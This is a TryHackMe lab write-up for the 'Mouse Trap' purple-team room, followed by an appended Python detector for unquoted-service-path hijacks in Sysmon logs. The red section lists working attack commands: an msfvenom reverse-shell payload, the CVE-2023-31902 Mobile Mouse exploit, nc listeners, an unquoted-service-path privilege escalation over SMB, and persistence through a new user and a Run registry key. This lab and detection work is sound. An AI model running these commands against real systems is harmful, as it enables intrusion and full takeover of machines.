TryHackMe | Mouse Trap
Follow Jom and Terry on their purple teaming adventures, emulating attacks and investigating the leftover artefacts.
First, I want to emphasize that this is a brief writeup for those who want a hint rather than a step-by-step solution. It is centered mostly on the red team part, because the blue part is very easy: I only needed the Find tool in Timeline Explorer and some patience.
RED PART
INITIAL ACCESS
- You may need to run Nmap for more info.
- Exploit link: https://github.com/blue0x1/mobilemouse-exploit
- Create shell.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4446 -f exe -o shell.exe
- Run the exploit:
python CVE-2023-31902-v2.py --target IP --lhost IP --file shell.exe
- Listen:
nc -lvnp 4446
Be aware that this may fail sometimes, but it should generally work without problem. Also, --lhost is optional.
PRIVILEGE ESCALATION
- Let’s run SharpUp:
On target machine, in purpletom’s folder:
.\SharpUp.exe audit
SharpUp recon
---
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Services with Unquoted Paths ===
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.
[*] Completed Privesc Checks in 4 seconds
---
- Reading this tutorial carefully, you should have a very good idea about what you should do, so read it! https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
- Create a payload similar to the one in the INITIAL ACCESS part, but this time use another port and name it Mouse.exe. The tutorial above also shows how to transfer it to the machine, but I'll show you briefly.
- Get the smbserver.py code from here: https://github.com/fortra/impacket/blob/master/examples/smbserver.py
- On your machine, after you created the Mouse.exe payload, run the following in that same folder:
python3 smbserver.py shared .
We use the SMB protocol to transfer the payload to the target.
- On the target, run the following in the Mobile Mouse folder, as indicated in the task info:
copy \\YOUR_MACHINE_IP\shared\Mouse.exe
- Now we should start the vulnerable service, but first we must listen for a shell:
- Your machine:
nc -lvnp PORT
- Target Machine:
sc start "Mobile Mouse Service"
- Your machine:
You should now run whoami and make sure it outputs NT AUTHORITY\SYSTEM. I had some problems here, in that when I tried to query the service it said it didn't exist. I don't know if I was just tired and didn't use the commands properly because it was late at night, or if it was really a bug, but every problem was solved by just restarting the machine. So, in case you think you did everything properly but this doesn't work, try a restart! :)
PERSISTENCE
Now that you are the boss of this machine, you can easily run these commands to get persistence:
net user terry /add
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f
I also added shell.exe in the right directory, just to make sure everything works well when I verify with the script on the Administrator's Desktop.
Given you followed the steps here, you should’ve finished the Red Part. If you encountered any difficulties, keep calm and be happy, because this is how learning takes place.
BLUE PART
There aren't a lot of things to say here. I personally used Timeline Explorer to solve this part. Follow the steps presented in the task info and then go to the top-right corner of the app, where you'll find the "find" search box.
Using text such as cmd.exe, .exe, powershell.exe, etc., I was able to find all the answers. So I don't think this will pose a hard challenge for you either.
I used Timeline Explorer because it seemed easier for me to use than SysmonView. I have yet to use SysmonView in future scenarios.
There are only 2 questions for which I want to give some hints:
- What is the full command-line of the tool used to enumerate the privilege escalation vectors?
Think of what we used in Red Part to find the vulnerable service and search for that program.
- What is the full command line value of the process created during the unquoted service path abuse?
Think of the original executable associated with the Mobile Mouse Service, which we also exploited.
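As an added example (not part of the original writeup or of the room's tooling), here is the check behind SharpUp's unquoted-path finding and the Blue-part hunt for the process it spawned, in Python: it computes the paths Windows tries for the Mobile Mouse service binary and flags Sysmon process-creation records whose image is one of those hijack locations with services.exe as parent. The sample events are constructed from the steps above, not taken from the room's logs; the purpletom path and event layout are assumptions.

```python
import ntpath
from typing import Dict, List

# Service binary exactly as SharpUp reported it above: unquoted and containing spaces.
SERVICE_IMAGE = r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe"


def hijack_candidates(image_path: str) -> List[str]:
    """Paths Windows tries, in order, for an unquoted service path with spaces.

    At every space the text before it is treated as the executable name and
    '.exe' is appended; the full path itself is the last (legitimate) candidate.
    """
    candidates = []
    idx = image_path.find(" ")
    while idx != -1:
        candidates.append(image_path[:idx] + ".exe")
        idx = image_path.find(" ", idx + 1)
    candidates.append(image_path)
    return candidates


def detect_unquoted_hijack(events: List[Dict[str, str]], service_image: str) -> List[Dict[str, str]]:
    """Flag Sysmon Event ID 1 records whose Image is one of the hijack locations
    (never the legitimate binary) and whose parent is services.exe, which is what
    a planted binary looks like when the service is started with `sc start`."""
    planted = {c.lower() for c in hijack_candidates(service_image)} - {service_image.lower()}
    hits = []
    for ev in events:
        if ev.get("EventID") != "1":
            continue
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        if ev.get("Image", "").lower() in planted and parent == "services.exe":
            hits.append(ev)
    return hits


# Constructed sample records (not taken from the room's Sysmon logs).
SAMPLE_EVENTS = [
    {"EventID": "1", "Image": r"C:\Users\purpletom\SharpUp.exe",
     "CommandLine": r".\SharpUp.exe audit", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Image": r"C:\Program Files (x86)\Mobile Mouse\Mouse.exe",
     "CommandLine": r"C:\Program Files (x86)\Mobile Mouse\Mouse.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": "1", "Image": SERVICE_IMAGE, "CommandLine": SERVICE_IMAGE,
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for hit in detect_unquoted_hijack(SAMPLE_EVENTS, SERVICE_IMAGE):
        print("unquoted service path hijack:", hit["CommandLine"])
```

The same candidate list tells a defender which directories need write-ACL review; quoting the ImagePath in the service's registry entry removes the whole class of candidates.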